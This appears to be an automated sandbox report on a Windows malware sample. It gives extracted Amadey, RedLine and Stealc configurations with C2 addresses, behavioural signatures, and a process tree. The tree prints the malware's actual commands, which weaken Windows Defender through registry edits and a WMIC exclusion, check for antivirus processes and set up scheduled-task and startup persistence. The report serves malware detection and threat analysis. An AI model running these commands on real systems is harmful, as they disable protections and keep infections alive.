Resubmissions

22-09-2024 12:04

240922-n813jsydlm 10

22-09-2024 11:59

240922-n5zqbaydna 10

Analysis

  • max time kernel
    176s
  • max time network
    177s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-09-2024 12:04

General

  • Target

    SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe

  • Size

    1.8MB

  • MD5

    b50e61fce59d4bd6da4eab9798984475

  • SHA1

    e9e883a41fbf361a905d1e8f82f6b532c217615d

  • SHA256

    dfb9ef7ebb9669af91fd101c394adf2f5c42188a88950a58ef5a1eb4c0b639f1

  • SHA512

    567552f8ce076d44c623a1027db29ceaba53899337e74c28ce39d0165538a5039930a357b6894dbc37d5a7c55ee0b6c20f69a5f2a4353ecc352d00d793928b6b

  • SSDEEP

    49152:0/1dlYQBvXG3N1BqeohM84N/wHJRrXOh4PQLMsP:edX030TM1krq4PQYs

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

stealc

Botnet

dear

C2

http://185.215.113.103

Attributes
  • url_path

    /e2b1563c6670f193.php

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

C2

http://185.215.113.19

Attributes
  • install_dir

    417fd29867

  • install_file

    ednfoki.exe

  • strings_key

    183201dc3defc4394182b4bff63c4065

  • url_paths

    /CoreOPT/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 3 IoCs

    ZharkBot is a botnet written C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 17 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 11 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 5 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 7 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3408
      • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe
        "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3184
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2464
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              PID:2780
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2004
            • C:\Users\Admin\AppData\Roaming\htTuxqBpUL.exe
              "C:\Users\Admin\AppData\Roaming\htTuxqBpUL.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4156
            • C:\Users\Admin\AppData\Roaming\ZcGPKztHEV.exe
              "C:\Users\Admin\AppData\Roaming\ZcGPKztHEV.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3448
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:2024
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              PID:5004
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:1520
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:6112
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:5396
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:5872
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            PID:5760
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6096
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5696
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              5⤵
                PID:5564
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5564 -s 412
                  6⤵
                  • Program crash
                  PID:5428
            • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
              "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
              4⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:1708
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                5⤵
                  PID:5860
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    6⤵
                    • Enumerates processes with tasklist
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5652
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "wrsa opssvc"
                    6⤵
                      PID:5632
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      6⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5692
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                      6⤵
                        PID:4160
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c md 607698
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:4524
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "MaskBathroomCompositionInjection" Participants
                        6⤵
                          PID:6092
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:4708
                        • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                          Waters.pif Q
                          6⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Checks computer location settings
                          • Executes dropped EXE
                          PID:1384
                          • C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000404101\Installeraus.exe"
                            7⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3876
                            • C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe
                              "C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe" -fullinstall
                              8⤵
                              • Sets service image path in registry
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • System Location Discovery: System Language Discovery
                              PID:2600
                          • C:\Users\Admin\AppData\Local\Temp\1000419001\channel3.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000419001\channel3.exe"
                            7⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Checks processor information in registry
                            PID:1560
                            • C:\Users\Admin\AppData\Local\Temp\service123.exe
                              "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:5460
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                              8⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:5532
                          • C:\Users\Admin\AppData\Local\Temp\1000427001\66eedb31c41f2_15.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000427001\66eedb31c41f2_15.exe"
                            7⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5800
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              8⤵
                              • Checks computer location settings
                              PID:5772
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          6⤵
                            PID:5336
                      • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                        4⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5432
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5932
                      • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                        4⤵
                        • Executes dropped EXE
                        PID:1360
                        • C:\Users\Admin\AppData\Local\Temp\7zSA851.tmp\Install.exe
                          .\Install.exe
                          5⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:5704
                          • C:\Users\Admin\AppData\Local\Temp\7zSAD81.tmp\Install.exe
                            .\Install.exe /udidyYuG "385121" /S
                            6⤵
                            • Checks BIOS information in registry
                            • Checks computer location settings
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Enumerates system info in registry
                            PID:5788
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                              7⤵
                                PID:5404
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:2500
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    9⤵
                                      PID:5048
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                        10⤵
                                          PID:5988
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                      8⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:5324
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        9⤵
                                          PID:5528
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                            10⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4536
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                        8⤵
                                        • Indirect Command Execution
                                        PID:1648
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          9⤵
                                            PID:5016
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              10⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5728
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                          8⤵
                                          • Indirect Command Execution
                                          PID:2980
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                            9⤵
                                              PID:1900
                                              • \??\c:\windows\SysWOW64\reg.exe
                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                10⤵
                                                  PID:1428
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                              8⤵
                                              • Indirect Command Execution
                                              • System Location Discovery: System Language Discovery
                                              PID:5200
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                9⤵
                                                  PID:6056
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    10⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2268
                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                      11⤵
                                                        PID:5128
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                7⤵
                                                • Indirect Command Execution
                                                PID:5160
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  8⤵
                                                    PID:5928
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                      9⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5888
                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        10⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5252
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /CREATE /TN "bdMaxxgchkeztGgKlw" /SC once /ST 12:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSAD81.tmp\Install.exe\" od /fxNCdidG 385121 /S" /V1 /F
                                                  7⤵
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4160
                                          • C:\Users\Admin\AppData\Local\Temp\1000308001\26e9faeed5.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000308001\26e9faeed5.exe"
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:5696
                                          • C:\Users\Admin\AppData\Local\Temp\1000314001\LummaC222222.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1000314001\LummaC222222.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5552
                                      • C:\Windows\system32\taskmgr.exe
                                        "C:\Windows\system32\taskmgr.exe" /4
                                        2⤵
                                        • Drops startup file
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:3180
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                        2⤵
                                          PID:3840
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                            3⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:4244
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                                          2⤵
                                          • Drops startup file
                                          PID:5048
                                        • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe
                                          "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe"
                                          2⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5364
                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                          "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:5100
                                        • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe
                                          "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.TrojanXgen.1325.25139.exe"
                                          2⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:936
                                      • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                        C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                        1⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1808
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault15be46aeh7465h4308h8f38hfbff1c986109
                                        1⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:5220
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffb53e46f8,0x7fffb53e4708,0x7fffb53e4718
                                          2⤵
                                            PID:5308
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,12261719137482725288,12659476132463031067,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                                            2⤵
                                              PID:5520
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,12261719137482725288,12659476132463031067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
                                              2⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5528
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,12261719137482725288,12659476132463031067,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
                                              2⤵
                                                PID:5544
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:5788
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:5828
